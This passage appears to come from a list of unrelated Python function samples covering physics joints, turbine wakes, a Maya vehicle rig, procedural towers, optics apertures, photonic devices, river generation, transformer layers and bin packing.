1)).cross(axis_inv)\n log.debug('hinge axis2 = %s', axis2)\n j.setAxis(tuple(axis1))\n # some anomaly here.. if we change the order of axis2 and axis1,\n # it should make no difference. instead there appears to be an\n # instability when the angle switches from -pi to +pi\n # so.. use parameter3 to control the hinge\n # (maybe this is only a problem in the test case with perfect axis alignment?)\n motor.setAxes(axis2, rotmat*axis1)\n elif bp.joint == 'universal':\n # bp.axis1/2 is relative to bp rotation, so rotate axes\n axis1 = rotmat * vec3(bp.axis1)\n axis2 = rotmat * vec3((0,0,1)).cross(vec3(bp.axis1))\n j.setAxis1(tuple(axis1))\n j.setAxis2(tuple(axis2))\n motor.setAxes(axis1, axis2)\n elif bp.joint == 'ball':\n axis1 = rotmat * vec3(bp.axis1)\n axis2 = rotmat * vec3((0,0,1)).cross(vec3(bp.axis1))\n motor.setAxes(axis1, axis2)\n\n log.debug('created joint with parent at %f,%f,%f', j_v[0], j_v[1], j_v[2])\n\n # recurse on children\n geom.child_joint_ends = set([ e.joint_end for e in bp.edges ])\n geom.parent_joint_end = joint_end\n if joint_end == None:\n # root\n if -1 in geom.child_joint_ends:\n geom.left = 'internal'\n else:\n geom.left = 'external'\n if 1 in geom.child_joint_ends:\n geom.right = 'internal'\n else:\n geom.right = 'external'\n else:\n # not root\n geom.left = 'internal'\n if 1 in geom.child_joint_ends:\n geom.right = 'internal'\n else:\n geom.right = 'external'\n\n for e in bp.edges:\n self.addBP(e.child, bp, e.joint_end)", "def other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! 
\"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def build_rig(self):\n\n\n # create rig part top nodes\n self.create_part_master()\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n anim_ctrls = self.anim_ctrls # Anim controls in this part\n bind_joints = self.bind_joints # Bind joints in this rig part\n world_scale_attr = self.hooks[0]+'.worldScale' # World scale multiplier (Each hooks has it's own world scale)\n hooks = self.hooks # A hook grp is created per hook attribute.\n ctrl_grps = self.ctrl_grps # A ctrl group is created per hook. Parent controls here.\n jnt_grps = self.jnt_grps # A joint groupd is created per hook. Parent joints here.\n noxform_grp = self.noxform_grp # No scale, no transform group for this rig part.\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n pickWalk_parent = options.get('pickWalkParent')\n\n world_grp = hooks[0]\n steering_grp = hooks[3]\n\n mc.addAttr(steering_grp, ln='camber', k=1, min=-10, max=10)\n mc.addAttr(steering_grp, ln='toe', min=-10, max=10, k=1)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n\n default_lock_value = utils.get_distance(l_prefix+'_shock_A_JNT', l_prefix+'_shock_B_JNT') * 0.333\n\n mc.addAttr(steering_grp, ln='suspensionExtensionMax', k=1, min=0,dv= default_lock_value)\n mc.addAttr(steering_grp, ln='suspensionCompressionMax', k=1, min=0,dv= default_lock_value)\n mc.addAttr(steering_grp, ln='steeringAngleMax', min=0, dv=45, k=1)\n\n mc.addAttr(steering_grp, ln='autoSteering', min=0, max=1, k=1)\n mc.addAttr(steering_grp, ln='autoWheel', min=0, max=1, k=1)\n mc.addAttr(steering_grp, ln='autoSteerAmount', k=0)\n\n mc.addAttr(steering_grp, ln='connectXforms', at='message')\n\n driver_jnt = mc.createNode('joint', n=prefix+'_chassis_driver_JNT', p=jnt_grps[2])\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT', r_prefix+'_lowerArm_end_JNT', driver_jnt)\n\n mirror_values = [1, -1]\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n\n # Create ctrls\n chassis_ctrl = hooks[1]\n\n up_strut = prefix+'_shock_A_JNT'\n lo_strut = prefix+'_shock_B_JNT'\n up_strut_end = prefix+'_shock_A_end_JNT'\n lo_strut_end = prefix+'_shock_B_end_JNT'\n steer_jnt = prefix+'_steeringArm_JNT'\n up_control_arm = prefix+'_upperArm_JNT'\n up_control_arm_end = prefix+'_upperArm_end_JNT'\n\n lo_control_arm = prefix+'_lowerArm_JNT'\n lo_control_arm_end 
= prefix+'_lowerArm_end_JNT'\n\n spindle = prefix+'_wheelhub_JNT'\n wheel_hub = prefix+'_wheelhub_end_JNT'\n steering_assembly = prefix+'_steeringArm_JNT'\n\n # Create ctrls\n loc = utils.snap_locator(steering_assembly )\n mc.delete(mc.aimConstraint(up_control_arm, loc, aim=[0,1,0], u=[0,0,1], wu=[0,0,1], wut='vector'))\n wheel_zero, wheel_ctrl, wheel_offsets, wheel_last_node = self.anim_ctrl(prefix+'_wheel_CTL', match_position=loc, node_type='transform')\n mc.delete(loc)\n\n loc = utils.snap_locator(prefix+'_ground_CTL_REF')\n ground_zero, ground_ctrl, ground_offsets, ground_last_node = self.anim_ctrl(prefix+'_ground_CTL', match_position=loc, node_type='transform')\n mc.delete(loc)\n\n mc.setAttr(wheel_ctrl+'.ro', 2)\n\n # wheel spin\n auto_wheel_off = mc.createNode('transform', p=spindle, n=wheel_ctrl+'_AUTO_OFF')\n auto_wheel = mc.createNode('transform', p=auto_wheel_off, n=wheel_ctrl+'_AUTO')\n mc.parent(auto_wheel_off, wheel_ctrl)\n\n mc.parent(wheel_offsets[0], auto_wheel)\n mc.makeIdentity(wheel_offsets[0], apply=1, t=1, r=1, s=1, n=0, pn=1)\n mc.xform(wheel_offsets[0], piv=(0,0,0))\n\n mc.orientConstraint(wheel_offsets[0], spindle)\n\n # wheel ctrl limits\n ctrls = [wheel_ctrl+'_CONST', wheel_ctrl+'_MOCAP', wheel_ctrl+'_OFF', wheel_ctrl]\n for ct in ctrls:\n mc.transformLimits(ct, tx=[0,0], ty=[0,0], etx=[1,1], ety=[1,1], tz=[0,0], etz=[1,1])\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransXLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransXLimit')\n\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransYLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransYLimit')\n\n mc.connectAttr(steering_grp+'.suspensionCompressionMax', ct+'.maxTransZLimit')\n utils.connect_negative(steering_grp+'.suspensionExtensionMax', ct+'.minTransZLimit')\n\n # wheel and ground\n mc.parent(wheel_zero, ground_zero, ctrl_grps[1])\n mc.pointConstraint(ground_last_node, wheel_ctrl+'_CONST', mo=1, skip=['x','z'])\n\n # lower control arm\n ik = mc.ikHandle(sj=lo_control_arm, ee=lo_control_arm_end)[0]\n mc.parent(ik, jnt_grps[2])\n mc.hide(ik)\n\n mc.parentConstraint(wheel_ctrl, lo_control_arm, mo=1)\n\n # up ctrl arm\n ik = mc.ikHandle(sj=up_control_arm, ee=up_control_arm_end)[0]\n mc.parent(ik, driver_jnt)\n mc.parentConstraint(wheel_ctrl, up_control_arm, mo=1)\n mc.hide(ik)\n\n # orient chassis loc\n\n # strut\n mc.parent(up_strut, driver_jnt)\n sloc = utils.snap_locator(lo_strut, name=up_strut+'_AIM_GRP', node_type='transform')\n mc.aimConstraint(sloc, up_strut, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='objectRotation', wuo=driver_jnt)\n mc.parent(sloc, lo_control_arm)\n mc.pointConstraint(sloc, lo_strut)\n\n # streering assembly orientation ############################################\n mc.parent(steer_jnt, lo_control_arm)\n mc.parentConstraint(wheel_ctrl, steer_jnt, mo=1)\n\n # streering assembly orientation, steering and toe ############################################\n for ct in ctrls:\n mc.transformLimits(ct, rx=[0,0], ry=[0,0], erx=[1,1], ery=[1,1], rz=[0,0], erz=[1,1])\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotXLimit')\n utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotXLimit')\n\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotYLimit')\n utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotYLimit')\n\n mc.connectAttr(steering_grp+'.steeringAngleMax', ct+'.maxRotZLimit')\n 
utils.connect_negative(steering_grp+'.steeringAngleMax', ct+'.minRotZLimit')\n\n # steering\n pma = mc.createNode('plusMinusAverage')\n if options.get('enableSteering'):\n\n aim = mc.createNode('transform', p=wheel_ctrl+'_CONST', n =wheel_ctrl+'_MOCAP_AIM')\n mc.setAttr(aim+'.ty', 10)\n mc.aimConstraint(aim, wheel_ctrl+'_MOCAP', aim=[0,1,0], u=[1,0,0], wu=[1,0,0], wuo=world_grp, wut='objectRotation')\n\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.tx', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n mc.connectAttr(sr+'.outValueX', pma+'.input1D[0]')\n\n # toe\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.toe', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n if mirror_value == 1:\n utils.connect_negative(sr+'.outValueX', pma+'.input1D[1]')\n else:\n mc.connectAttr(sr+'.outValueX', pma+'.input1D[1]')\n\n mc.connectAttr(pma+'.output1D', wheel_ctrl+'_OFF.ry')\n\n # autp steering setup\n cl = mc.createNode('clamp')\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_negative(steering_grp+'.steeringAngleMax', cl+'.minR')\n mc.connectAttr(steering_grp+'.steeringAngleMax', cl+'.maxR')\n mc.connectAttr(steering_grp+'.autoSteerAmount', cl+'.inputR')\n\n mc.connectAttr(cl+'.outputR', mdl+'.i1')\n mc.connectAttr(steering_grp+'.autoSteering', mdl+'.i2')\n\n mc.connectAttr(mdl+'.o', pma+'.input1D[2]')\n\n # steering arm piston\n aim = utils.snap_locator(prefix+'_steeringArm_B_JNT', name=prefix+'_steering_A_AIM', node_type='transform')\n mc.parent(aim, steer_jnt)\n mc.parent(prefix+'_steeringArm_A_JNT', driver_jnt)\n mc.pointConstraint(aim, prefix+'_steeringArm_B_JNT')\n mc.aimConstraint(aim, prefix+'_steeringArm_A_JNT', aim=[mirror_value, 0,0], u=[0,1,0], wu=[0,1,0], wuo=driver_jnt, wut='objectRotation')\n\n # camber\n sr = mc.createNode('setRange')\n mc.connectAttr(steering_grp+'.camber', sr+'.vx')\n mc.connectAttr(steering_grp+'.steeringAngleMax', sr+'.maxX', f=1)\n utils.connect_negative(steering_grp+'.steeringAngleMax', sr+'.minX')\n mc.setAttr(sr+'.oldMinX', -10)\n mc.setAttr(sr+'.oldMaxX', 10)\n\n if mirror_value == 1:\n utils.connect_negative(sr+'.outValueX', wheel_ctrl+'_OFF.rz')\n else:\n mc.connectAttr(sr+'.outValueX', wheel_ctrl+'_OFF.rz')\n\n # autowheel\n mc.addAttr(auto_wheel, ln='autoSpin', k=1)\n mc.connectAttr(auto_wheel+'.autoSpin', auto_wheel+'.rx')\n\n driver = utils.snap_locator(spindle, name=prefix+'_autoWheel_DRV', node_type='transform')\n mc.parent(driver, steer_jnt)\n connect_auto_wheel(driver, steering_grp, auto_wheel+'.autoSpin', world_scale_node=hooks[0])\n\n utils.set_attrs(wheel_ctrl, 'rx s', l=1, k=0)\n if not options.get('enableSteering'):\n utils.set_attrs(wheel_ctrl, 'ry', l=1, k=0)", "def aecSpaceRandomTowers():\n origin = aecPoint(0, 0, 0)\n displace = 175\n spacer = aecSpacer()\n shaper = aecShaper()\n \n def full(point, xWidth, yDepth, zHeight, level):\n floor = aecSpace()\n floor.boundary = shaper.makeBox(point, xWidth, yDepth)\n floor.height = zHeight\n floor.level = level\n setColors([floor])\n return [floor]\n \n def halfDepth(point, xWidth, yDepth, zHeight, level):\n depth = yDepth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = 
zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n setColors(halfSpaces)\n return halfSpaces\n \n def halfWidth(point, xWidth, yDepth, zHeight, level):\n width = xWidth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1)\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterDepth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n depth = yDepth * 0.25\n scale = 3\n else:\n depth = yDepth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n halfSpaces[1].scale(1, scale, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterWidth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n width = xWidth * 0.25\n scale = 3\n else:\n width = xWidth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1)\n halfSpaces[1].scale(scale, 1, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def setColors(halfSpaces):\n colors = [aecColor.blue, aecColor.orange, aecColor.purple, aecColor.yellow]\n colorPick = randint(0, 3)\n halfSpaces[0].color = colors[colorPick]\n if len(halfSpaces) == 1: return\n colors.reverse()\n halfSpaces[1].color = colors[colorPick]\n \n def makeFloor(point, xWidth, yDepth, zHeight, level):\n floorType = randint(0, 4)\n if floorType == 0: floorSpaces = full(point, xWidth, yDepth, zHeight, level)\n if floorType == 1: floorSpaces = halfDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 2: floorSpaces = halfWidth(point, xWidth, yDepth, zHeight, level)\n if floorType == 3: floorSpaces = quarterDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 4: floorSpaces = quarterWidth(point, xWidth, yDepth, zHeight, level)\n return floorSpaces\n \n def makeCore(point, xWidth, yDepth, zHeight): \n xCoord = (point.x - 5) + (xWidth * 0.5)\n yCoord = (point.y + (yDepth * (randint(0, 9) * 0.1)))\n point = aecPoint(xCoord, yCoord, point.z)\n core = aecSpace()\n core.boundary = shaper.makeBox(point, 10, 20)\n core.height = zHeight\n core.color = aecColor.gray\n return [core]\n \n def makeTower(point):\n floors = []\n xWidth = uniform(20, 60)\n yDepth = uniform(20, 60)\n levels = randint(5, 50)\n zHeight = uniform(3, 6)\n plinth = aecSpace()\n plinth.boundary = shaper.makeBox(point, xWidth, yDepth)\n plinthScaleX = (uniform(1, 2.5))\n plinthScaleY = (uniform(1, 2.5))\n plinth.scale(plinthScaleX, plinthScaleY, 2, plinth.centroid_floor)\n plinth.height = (zHeight * 2)\n plinth.color = aecColor.green\n floors.append(plinth)\n floors = floors + makeCore(point, xWidth, yDepth, zHeight * (levels + 3))\n level = (zHeight * 2)\n x = 0\n while x < levels:\n floors = floors + makeFloor(point, xWidth, yDepth, zHeight, level)\n level += zHeight\n x += 1 \n return floors\n \n def makeTowerRow(point, columns, displacement):\n towers = []\n towers = towers + makeTower(point)\n x = 0\n while x < columns:\n point.x += displacement\n towers = towers + makeTower(point)\n x += 1\n return towers\n \n def makeTowerRows(point, displacement, columns, rows):\n towers = []\n x = 0\n while x < rows:\n towers = towers + makeTowerRow(point, 
columns, displacement)\n point.x = 0\n point.y += displacement\n x += 1\n return towers\n \n return makeTowerRows(origin, displace, 4, 5)", "def expand_slicer_aperture(system):\n\n # First of all, we need to find the Surface Number for the IMAGE SLICER\n N_surfaces = system.LDE.NumberOfSurfaces\n surface_names = {} # A dictionary of surface number -> surface comment\n for k in np.arange(1, N_surfaces):\n surface_names[k] = system.LDE.GetSurfaceAt(k).Comment\n # find the Slicer surface number\n try:\n # The naming convention for this surface has changed. Not the same for Nominal Design as Monte Carlos\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('Slicer Mirror')]\n except ValueError:\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('IFU ISA')]\n slicer = system.LDE.GetSurfaceAt(slicer_num)\n\n # Read Current Aperture Settings\n apt_type = slicer.ApertureData.CurrentType\n # print(\"Aperture type: \", apt_type)\n if apt_type == 4: # 4 is Rectangular aperture\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # print(\"Current Settings:\")\n x0 = current_apt_sett._S_RectangularAperture.XHalfWidth\n y0 = current_apt_sett._S_RectangularAperture.YHalfWidth\n # If the Y aperture hasn't been changed already, we change it here to 999 mm to get all rays through\n if y0 != 999:\n # Change Settings\n aperture_settings = slicer.ApertureData.CreateApertureTypeSettings(\n constants.SurfaceApertureTypes_RectangularAperture)\n aperture_settings._S_RectangularAperture.XHalfWidth = x0\n aperture_settings._S_RectangularAperture.YHalfWidth = 999\n slicer.ApertureData.ChangeApertureTypeSettings(aperture_settings)\n\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # Notify that we have successfully modified the aperture\n print(\"Changing aperture of surface: \", slicer.Comment)\n print(\"New Settings:\")\n print(\"X_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.XHalfWidth)\n print(\"Y_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.YHalfWidth)\n\n return", "def arm(self):\n pass", "def taper(length = 10, width1 = 5, width2 = None, port = None, layer = 0):\n if type(port) is Port and width1 is None: width1 = port.width\n if width2 is None: width2 = width1\n xpts = [0, length, length, 0]\n ypts = [width1/2, width2/2, -width2/2, -width1/2]\n\n D = Device('taper')\n D.add_polygon([xpts, ypts], layer = layer)\n D.add_port(name = 1, midpoint = [0, 0],\n width = width1, orientation = 180)\n D.add_port(name = 2, midpoint = [length, 0],\n width = width2, orientation = 0)\n if type(port) is Port:\n D.rotate(angle = port.orientation, center = [0, 0])\n D.move(origin = [0, 0], destination = port.midpoint)\n return D", "def add_river_greedy(me, lm, material_dict, imgs, rounded_river,\n min_length):\n print(\" Building random river...\")\n cell_source = get_river_source(material_dict)\n if not(cell_source):\n print(\"no cell source\")\n return\n xi,yi = cell_source\n cell_source = lm.cells[xi][yi]\n path = [cell_source]\n cell_xy = cell_source\n maxn = 1000\n it = 0\n should_finish = False\n margin = 0.01\n lake_probability = 0.5\n while True:\n if it > maxn:\n break\n elif \"water\" in cell_xy.material.name.lower():\n break\n elif should_finish:\n break\n it += 1\n section_length = random.randint(2,10)\n if random.random() < 0.5:\n sign = 1\n else:\n sign = -1\n if random.random() < 0.5:\n dx, dy = sign, 0\n else:\n dx, dy = 0, sign\n## print(dx,dy,section_length)\n 
################################################\n for i in range(section_length):\n if should_finish:\n break\n x = cell_xy.coord[0] + dx\n y = cell_xy.coord[1] + dy\n new_cell = lm.get_cell_at(x,y)\n if new_cell is None:\n break\n elif new_cell.h - margin > cell_xy.h:\n if cell_xy.material.name != new_cell.material.name:\n break\n elif new_cell in path:\n break\n elif new_cell.name != \"river\":\n is_valid = True\n for neigh in new_cell.get_neighbors_von_neuman():\n if neigh:\n if not(neigh is cell_xy):\n if neigh.name == \"river\":\n is_valid = False\n break\n elif \"water\" in neigh.material.name.lower():\n should_finish = True\n elif neigh in path:\n is_valid = False\n break\n if is_valid:\n cell_xy = new_cell\n path.append(new_cell)\n## print(\"OK\",dx,dy,section_length)\n else:\n break\n else:\n break\n #4) change the end to first shallow shore cell\n actual_path = []\n for cell in path:\n if cell.name == \"river\":\n break\n actual_path.append(cell)\n if \"water\" in cell.material.name.lower():\n break\n else: #LAKE ?\n next_to_water = False\n for neigh in cell.get_neighbors_von_neuman():\n if neigh:\n if \"water\" in neigh.material.name.lower():\n next_to_water = True\n break\n if next_to_water:\n break\n if len(actual_path) < min_length:\n return\n if actual_path[0].material.name == actual_path[-1].material.name:\n return\n elif not(\"water\" in actual_path[-1].material.name.lower()):\n if random.random() < lake_probability:\n pass\n else:\n return\n #build images of river\n objs = {}\n for delta in imgs: #imgs[(dx,dy)][zoom]\n river_obj = MapObject(me, imgs[delta][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n objs[delta] = river_obj\n #5) add river cells to map and layer\n for i,cell in enumerate(actual_path):\n prepare_cell_for_river(lm, cell)\n dx,dy,corner = get_path_orientation(i, cell, actual_path)\n if rounded_river:\n c = objs.get((dx,dy,corner))\n else:\n c = objs.get((dx,dy,None))\n if not c:\n raise Exception(\"No river object for delta\", dx, dy, corner)\n assert cell.name != \"river\"\n c = c.add_copy_on_cell(cell)\n cell.name = \"river\"\n lm.static_objects.append(c)\n\n if actual_path:\n## print(\"RIVER BUILT:\", [cell.coord for cell in actual_path])\n if not(\"water\" in actual_path[-1].material.name.lower()):\n for neigh in actual_path[-1].get_neighbors_moore():\n if neigh and neigh.name != \"river\":\n prepare_cell_for_river(lm, neigh)\n river_obj = MapObject(me, imgs[(0,0,None)][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n river_obj = river_obj.add_copy_on_cell(neigh)\n neigh.name = \"river\"\n lm.static_objects.append(river_obj)\n return objs", "def __init__(self, mbart_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([mbart_layer.self_attn.q_proj.weight, mbart_layer.self_attn.k_proj.weight, mbart_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([mbart_layer.self_attn.q_proj.bias, mbart_layer.self_attn.k_proj.bias, mbart_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = mbart_layer.self_attn.out_proj.weight\n self.out_proj_bias = mbart_layer.self_attn.out_proj.bias\n self.linear1_weight = mbart_layer.fc1.weight\n self.linear1_bias = mbart_layer.fc1.bias\n self.linear2_weight = mbart_layer.fc2.weight\n self.linear2_bias = mbart_layer.fc2.bias\n self.norm1_eps = mbart_layer.self_attn_layer_norm.eps\n self.norm1_weight = mbart_layer.self_attn_layer_norm.weight\n self.norm1_bias = mbart_layer.self_attn_layer_norm.bias\n self.norm2_eps = 
mbart_layer.final_layer_norm.eps\n self.norm2_weight = mbart_layer.final_layer_norm.weight\n self.norm2_bias = mbart_layer.final_layer_norm.bias\n self.num_heads = mbart_layer.self_attn.num_heads\n self.embed_dim = mbart_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.norm_first = True\n self.validate_bettertransformer()", "def initialize_full_optimization(self):\n # Do some setup\n self.debumper.cells = cells.Cells(5)\n self.debumper.cells.assign_cells(self.biomolecule)\n self.biomolecule.calculate_dihedral_angles()\n self.biomolecule.set_donors_acceptors()\n self.biomolecule.update_internal_bonds()\n self.biomolecule.set_reference_distance()\n self.optlist = []\n self.atomlist = []\n # First initialize the various types\n for residue in self.biomolecule.residues:\n optinstance = self.is_optimizeable(residue)\n if isinstance(residue, aa.Amino):\n residue.fixed = (\n 1 if False in residue.stateboolean.values() else 0\n )\n if optinstance is None:\n continue\n\n type_ = optinstance.opttype\n if residue.fixed != 1:\n klass = getattr(structures, type_)\n myobj = klass(residue, optinstance, self.debumper)\n self.atomlist += myobj.atomlist\n self.optlist.append(myobj)\n self.resmap[residue] = myobj\n _LOGGER.debug(\"Done.\")", "def ramp(length = 10, width1 = 5, width2 = 8, layer = 0):\n if width2 is None: width2 = width1\n xpts = [0, length, length, 0]\n ypts = [width1, width2, 0, 0]\n D = Device('ramp')\n D.add_polygon([xpts, ypts], layer = layer)\n D.add_port(name = 1, midpoint = [0, width1/2],\n width = width1, orientation = 180)\n D.add_port(name = 2, midpoint = [length, width2/2],\n width = width2, orientation = 0)\n return D", "def weight4width(box_width,platformWidth,stairsLength,stepCount,stepWidth):\n if (platformWidth-stairsLength)<0:\n platformWidth = stairsLength + 50 #platform width must larger than stairs length ,the value is 50\n return platformWidth\n else:return platformWidth", "def tail_joiner(self):\n\n # Fusing Right Horizontal Tail:\n shape_in_r = Fused(shape_in=self.stabilizer_h.solid, tool=self.stabilizer_vright.solid)\n shape_out_r = Fused(shape_in=shape_in_r, tool=self.connector_right)\n\n # Fusing Left Horizontal Tail:\n shape_in_l = Fused(shape_in=self.stabilizer_h.ht_mirror, tool=self.stabilizer_vleft.solid)\n shape_out_l = Fused(shape_in=shape_in_l, tool=self.connector_left)\n\n shape_out = Fused(shape_in=shape_out_r, tool=shape_out_l)\n\n return shape_out", "def monolayer_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [0, 0, h], 0),\n ('B', [s, 0, 0], 0),\n ('C', [ax/2, ay/2, 0], 0),\n ('D', [ax/2 + s, ay/2, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([ 0, 1], 'A', 
'B', 't5'),\n ([ 0, -1], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5'),\n ([ 0, 1], 'C', 'D', 't5'),\n ([ 0, -1], 'C', 'D', 't5'),\n )\n\n return lat", "def __init__(self, bart_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bart_layer.self_attn.q_proj.weight, bart_layer.self_attn.k_proj.weight, bart_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bart_layer.self_attn.q_proj.bias, bart_layer.self_attn.k_proj.bias, bart_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = bart_layer.self_attn.out_proj.weight\n self.out_proj_bias = bart_layer.self_attn.out_proj.bias\n self.linear1_weight = bart_layer.fc1.weight\n self.linear1_bias = bart_layer.fc1.bias\n self.linear2_weight = bart_layer.fc2.weight\n self.linear2_bias = bart_layer.fc2.bias\n self.norm1_eps = bart_layer.self_attn_layer_norm.eps\n self.norm1_weight = bart_layer.self_attn_layer_norm.weight\n self.norm1_bias = bart_layer.self_attn_layer_norm.bias\n self.norm2_eps = bart_layer.final_layer_norm.eps\n self.norm2_weight = bart_layer.final_layer_norm.weight\n self.norm2_bias = bart_layer.final_layer_norm.bias\n self.num_heads = bart_layer.self_attn.num_heads\n self.embed_dim = bart_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.validate_bettertransformer()", "def initialize():\n initialize_gripper()\n assert right_gripper.is_ready()\n print(\"Initialized gripper\")\n rospy.sleep(2.0)\n add_constraint('right_wall', 0, right_wall_dist, 0, 4, 0.1, 4) \n add_constraint('left_wall', 0, left_wall_dist, 0, 4, 0.1, 4)\n add_constraint('back_wall', back_wall_dist, 0, 0,0.1, 4, 4)\n #self.add_constraint('table', 0,308, 0, -0.115, 4, 4, 0.1 )\n mouth_pose = get_mouth_pose()\n #add_constraint('person',mouth_pose.x, mouth_pose.y, mouth_pose.z, 4,4,4)", "def stretch(self, x_stretch=1, y_stretch=1):\n self.width *= x_stretch\n self.height *= y_stretch\n\n # Always update the corners after operation\n self.update_corners()\n return", "def RoomyStrategy(I_list,box_list):\n SortedItems = quick_sort(I_list)\n lemon = []\n iso = 0\n for element in range(0, len(SortedItems)):\n w = SortedItems[element].weight\n x = FindMaxCap(box_list)\n if w <= x.max_cap - x.curr_cap:\n x.curr_cap += w\n x.items_list.append(SortedItems[element])\n lemon.append(SortedItems[element])\n iso+=1\n else:\n pass\n print('Results from Greedy Strategy 1')\n if len(SortedItems) == iso:\n print('All 